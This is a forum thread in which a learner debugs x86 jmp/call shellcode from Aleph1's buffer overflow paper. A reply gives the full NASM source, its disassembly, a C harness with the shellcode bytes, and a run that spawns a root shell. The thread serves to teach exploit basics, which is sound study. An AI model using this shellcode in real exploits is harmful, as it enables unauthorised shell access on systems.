basic shellcode on backtrack?

[eternaty]

Wassup everyone, how's everyone tonight? Well I've begun exploration into the world of buffer overflows and the like but I'm having some trouble getting my own shellcode to run. I mean it's not really shellcode yet, but in attempting the jmp/call method described in aleph1's paper gives me segmentation faults on line 11 of my code.

ASM (NASM) | section .text global _start - At_eternaty - 76rJiprD - Pastebin.com

Im just wondering if it's a problem in my code or if backtrack has some kind of protection scheme for this? Not really sure, but any advice is greatly appreciated, thanks.

[orgcandman]

If the line number can be trusted, then you're segfaulting on

mov byte [ebx+7], al ; *(char *)((char *)ebx+7) = ax & 0xF

Which makes me wonder what the value of ebx is (ie: is it out of bounds?)

[eternaty]

well since the call to jmpback is made, the return address of the call should be pushed on the stack, which is actually just the address to the /bin/sh string. so thats what should be in ebx but it seems like its not getting the value

[orgcandman]

NOTE: I've assembled and executed the shell code provided with no issues - using BT4 and ubuntu 10.04 x64 (with the multilib development libraries to support building 32-bit code).

The following is my command to turn the asm into bytecode:

Code:

XXXXXXXXXX:~$ cat test.s 
section .text

global _start

_start:
jmp callback
jmpback:
pop ebx
xor eax, eax

mov byte [ebx+7], al
mov dword [ebx+8], ebx
mov dword [ebx+12], eax
lea ecx, [ebx+8]

lea edx, [ebx+12]

mov al, 0x0b
int 0x80

callback:
call jmpback
string db "/bin/sh"
XXXXXXXXXX:~$ nasm -f elf32 test.s 
XXXXXXXXXX:~$ objdump -d test.o 

test.o:     file format elf32-i386


Disassembly of section .text:

00000000 <_start>:
   0:	e9 16 00 00 00       	jmp    1b <callback>

00000005 <jmpback>:
   5:	5b                   	pop    %ebx
   6:	31 c0                	xor    %eax,%eax
   8:	88 43 07             	mov    %al,0x7(%ebx)
   b:	89 5b 08             	mov    %ebx,0x8(%ebx)
   e:	89 43 0c             	mov    %eax,0xc(%ebx)
  11:	8d 4b 08             	lea    0x8(%ebx),%ecx
  14:	8d 53 0c             	lea    0xc(%ebx),%edx
  17:	b0 0b                	mov    $0xb,%al
  19:	cd 80                	int    $0x80

0000001b <callback>:
  1b:	e8 e5 ff ff ff       	call   5 <jmpback>

00000020 <string>:
  20:	2f                   	das    
  21:	62 69 6e             	bound  %ebp,0x6e(%ecx)
  24:	2f                   	das    
  25:	73 68                	jae    8f <string+0x6f>

This gets the raw byte-code.

Then, I turn it into an executable C program with:

Code:

XXXXXXXXXX:~$ cat shellcode.c
char sc[] = {
0xe9,0x16,0x00,0x00,0x00,0x5b,0x31,0xc0,0x88,0x43,0x07,0x89,0x5b,
0x08,0x89,0x43,0x0c,0x8d,0x4b,0x08,0x8d,0x53,0x0c,0xb0,0x0b,0xcd,
0x80,0xe8,0xe5,0xff,0xff,0xff,0x2f,0x62,0x69,0x6e,0x2f,0x73,0x68
};

typedef void (*f)();

int main()
{
    f func;
    func = (f)sc;
    func();
    return 0;

}

And execute, as:

Code:

XXXXXXXXXX:~$ gcc -o sc shellcode.c
XXXXXXXXXX:~$ ./sc 
sh-3.2# id
uid=0(root) gid=0(root) groups=0(root)
sh-3.2# exit
exit

Again, note I've tested on BT4 Final _AND_ ubuntu 10.04

[eternaty]

thanks a lot for your reply. It cleared up a few things. Stupid me.. i was trying to assemble this code and run it from the shell rather than inside the stack. i didnt realize that the code section in protected mode is read only so thats why it was crashing when i was tryna add those values after the /bin/sh string.